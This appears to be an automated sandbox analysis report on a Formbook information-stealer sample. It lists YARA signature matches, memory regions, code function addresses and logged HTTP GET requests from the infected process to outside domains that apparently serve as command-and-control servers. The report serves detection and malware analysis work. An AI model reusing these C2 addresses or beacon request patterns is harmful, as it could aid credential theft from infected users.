          Source: global trafficHTTP traffic detected: GET /ocgr/?lfvx9=JFNTlvkP_&P2Jl4=yHjxPQMm3JcJX2wgLRnbME7+3RpzNlr7I3qSF8qv7PZk+uQof5Nzr3YLke9JRpMCS0ME HTTP/1.1Host: www.hofwimmer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?P2Jl4=o9xz2vqcTVXu/W078IUcrzT+VrP3S9wZB9suAAi9fTl7LQCsWydvJWt3Uuk2q/fLQQGI&lfvx9=JFNTlvkP_ HTTP/1.1Host: www.lotsimprovements.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ocgr/?lfvx9=JFNTlvkP_&P2Jl4=zPygAtD4LGfbsOxaPXlKDZlA/HZsirEX7sJv7vNHedMyDqAMsgZk6w8aA/BuIJhq09F8 HTTP/1.1Host: www.xn--hj2bz6fwvan2be1g5tb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: fooYgfbxno.exe, 00000001.00000002.268464852.0000000000FAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: fooYgfbxno.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED
          Source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\fooYgfbxno.exeCode function: 1_2_008258D3
          Source: C:\Users\user\Desktop\fooYgfbxno.exeCode function: 1_2_00F95AB0
          Source: C:\Users\user\Desktop\fooYgfbxno.exeCode function: 1_2_00F924D1
          Source: C:\Users\user\Desktop\fooYgfbxno.exeCode function: 1_2_00F90678
          Source: C:\Users\user\Desktop\fooYgfbxno.exeCode function: 1_2_00F91CE8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041C950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00408C6B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00408C70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041BE42
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041C66C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041CFB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0151F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01534120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015399BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015EE824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E28EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0152B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015420A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E20A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015BCB4F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E2B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D03DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154ABD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015DDBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015C23E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153EB9A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154138B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B236
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015CFA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E22AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E2D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01510D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E25DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0152D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01542581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015DD466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0152841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015EDFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E1FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015DD616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01536E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E2EF7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394EB9A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0395138B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0395EBB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E03DA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039EDBD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0395ABD8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039D23E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039F2B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039CCB4F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394AB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039F22AE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394B236
